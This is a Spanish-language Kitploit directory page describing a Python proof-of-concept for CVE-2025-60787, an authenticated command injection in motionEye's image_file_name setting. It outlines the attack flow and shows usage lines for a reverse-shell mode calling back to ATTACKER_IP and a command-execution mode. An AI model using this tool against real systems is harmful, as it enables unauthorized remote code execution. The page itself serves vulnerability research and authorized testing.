Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-60787-POC — PoC en Python para CVE-2025-60787, inyección de comandos del sistema operativo autenticada (RCE) en motionEye <= 0.43.1b4 a través de la configuración image_file_name sin sanear | Kitploit
Herramientas/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

PoC en Python para CVE-2025-60787, inyección de comandos del sistema operativo autenticada (RCE) en motionEye <= 0.43.1b4 a través de la configuración image_file_name sin sanear

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-60787 - RCE autenticado en motionEye

Ejecución remota de código autenticada en motionEye <= 0.43.1b4 a través de un parámetro de configuración de motion sin saneamiento

Autor: d3vn0mi


Resumen de la vulnerabilidad

CampoDetalles
ID CVECVE-2025-60787
Puntuación CVSS7.2 (Alta)
TipoInyección de comandos del sistema operativo (CWE-78)
AfectadosmotionEye <= 0.43.1b4
Corregido en0.43.1b5

motionEye acepta cadenas arbitrarias en campos de configuración como image_file_name y las escribe directamente en los archivos de configuración de Motion (/etc/motioneye/camera-*.conf). Cuando el servicio de Motion se reinicia, interpreta estos campos como cadenas expandibles por el shell, lo que permite a un atacante autenticado inyectar y ejecutar comandos arbitrarios del sistema operativo.

La interfaz web incluye validación del lado del cliente para estos campos, pero se puede omitir fácilmente enviando solicitudes API manipuladas directamente.

Flujo del ataque

  1. Autenticarse en motionEye con credenciales de administrador válidas
  2. Obtener la lista de configuración de cámaras
  3. Enviar vía POST una configuración modificada con un valor malicioso en image_file_name
  4. Motion procesa el comando inyectado al tomar capturas (a través de capture_mode: interval-snapshots)

Requisitos

  • Python 3.6+
  • Librería requests
  • Credenciales de administrador válidas de motionEye
  • Acceso por red a la instancia de motionEye objetivo

Instalación

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

Uso

El exploit admite dos modos: shell inversa y ejecución de comandos.

Shell inversa

Inicia un listener en tu máquina y luego ejecuta:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

Ejecución de comandos

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

Opciones

Referencias

  • Aviso de GitHub - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Módulo Metasploit de Rapid7
  • Proyecto motionEye

Créditos

  • d3vn0mi - Desarrollo del exploit y herramientas
  • gunzf0x - Descubrimiento e investigación original del CVE

Aviso legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso de este software. Obtén siempre la autorización adecuada antes de realizar pruebas.

Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Descargar herramienta
FlagDescripción
--urlURL de motionEye objetivo incluido el puerto
--userNombre de usuario de motionEye
--passwordContraseña de motionEye
-i / --hostIP del listener (modo shell inversa)
--portPuerto del listener (modo shell inversa)
-e / --execComando a ejecutar (modo comando)
--camera-idSeleccionar un ID de cámara específico
--shUsar /bin/sh en lugar de /bin/bash
--no-verifyOmitir la verificación del certificado TLS
--proxyEnrutar el tráfico a través de un proxy (p. ej., http://127.0.0.1:8080)